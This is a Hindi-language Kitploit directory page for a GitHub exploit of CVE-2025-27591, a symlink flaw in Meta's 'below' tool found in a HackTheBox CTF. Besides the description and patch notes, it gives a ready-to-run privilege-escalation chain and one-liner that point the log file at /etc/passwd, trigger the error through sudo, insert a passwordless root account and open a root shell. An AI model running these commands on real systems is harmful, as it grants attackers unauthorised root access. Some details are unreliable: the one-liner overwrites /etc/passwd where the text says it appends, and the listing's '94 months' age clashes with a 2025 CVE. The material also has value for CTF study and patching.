Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनCTFबाइनरी शोषण
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – मेटा नीचे सिमलिंक के बाद स्थानीय विशेषाधिकार वृद्धि (HackTheBox CTF)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
94 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-27591 — Meta below सिमलिंक स्थानीय विशेषाधिकार वृद्धि

अवलोकन

फ़ील्डविवरण
CVECVE-2025-27591
सॉफ्टवेयरMeta below (सिस्टम संसाधन मॉनिटर)
प्रभावित संस्करण< 0.9.0
भेद्यतासिमलिंक अनुसरण → रूट के रूप में मनमानी फ़ाइल अधिलेखित
प्रमाणीकरणbelow तक sudo पहुंच वाला स्थानीय उपयोगकर्ता
प्रभावरूट तक स्थानीय विशेषाधिकार वृद्धि
संदर्भHackTheBox CTF के दौरान खोजा गया

विवरण

below सिस्टम संसाधन निगरानी उपकरण (Meta Platforms, Inc. द्वारा) के त्रुटि लॉगिंग तंत्र में एक दोष है। जब इसे sudo के माध्यम से आमंत्रित किया जाता है, तो यह /var/log/below/ में स्थित अपनी लॉग फ़ाइलों पर 0666 अनुमतियाँ बलपूर्वक सेट करता है, बिना पहले जाँचे कि लक्ष्य पथ एक सिमलिंक है या नहीं। यह एक स्थानीय हमलावर को लॉग फ़ाइल को किसी भी रूट-लेखन योग्य फ़ाइल की ओर इशारा करने वाले सिमलिंक से बदलने की अनुमति देता है, जिससे प्रभावी रूप से उस फ़ाइल को नियंत्रित सामग्री से अधिलेखित किया जा सकता है।

तकनीकी विवरण

मूल कारण

नीचे दिए गए संचालन below < 0.9.0 में लॉगिंग कोड द्वारा रूट के रूप में चलने पर अनुक्रम में किए जाते हैं:

  1. लॉग पथ निर्धारित करता है: /var/log/below/error_root.log
  2. फ़ाइल बनाता या खोलता है
  3. chmod(path, 0o666) को कॉल करता है — यह जाँचे बिना कि यह सिमलिंक है या नहीं
  4. त्रुटि संदेश को पथ पर लिखता है

चरण 4 पर, यदि निष्पादन से पहले पथ को सिमलिंक से बदल दिया गया था, तो लेखन सिमलिंक के लक्ष्य पर चला जाता है।

शोषण श्रृंखला

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

--time "invalid" क्यों काम करता है

अमान्य समय स्ट्रिंग पास करने से below त्रुटि संदेश लॉग करने के लिए मजबूर होता है। त्रुटि पथ लॉगिंग कोड तक पहुँचता है जो फ़ाइल पर आँख बंद करके लिखता है, जो अब हमारा सिमलिंक है।

उपयोग

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

पूर्वापेक्षा: वर्तमान उपयोगकर्ता के पास /usr/bin/below निष्पादित करने के लिए sudo अधिकार होने चाहिए।

एक-लाइनर

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

अवधारणा का प्रमाण

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

पैच

भेद्यता को below संस्करण 0.9.0 में ठीक किया गया था। फिक्स लॉगिंग पथ में किसी भी फ़ाइल संचालन से पहले एक सिमलिंक जाँच शुरू करता है।

संदर्भ

  • NVD प्रविष्टि
  • Meta below GitHub
टूल डाउनलोड करें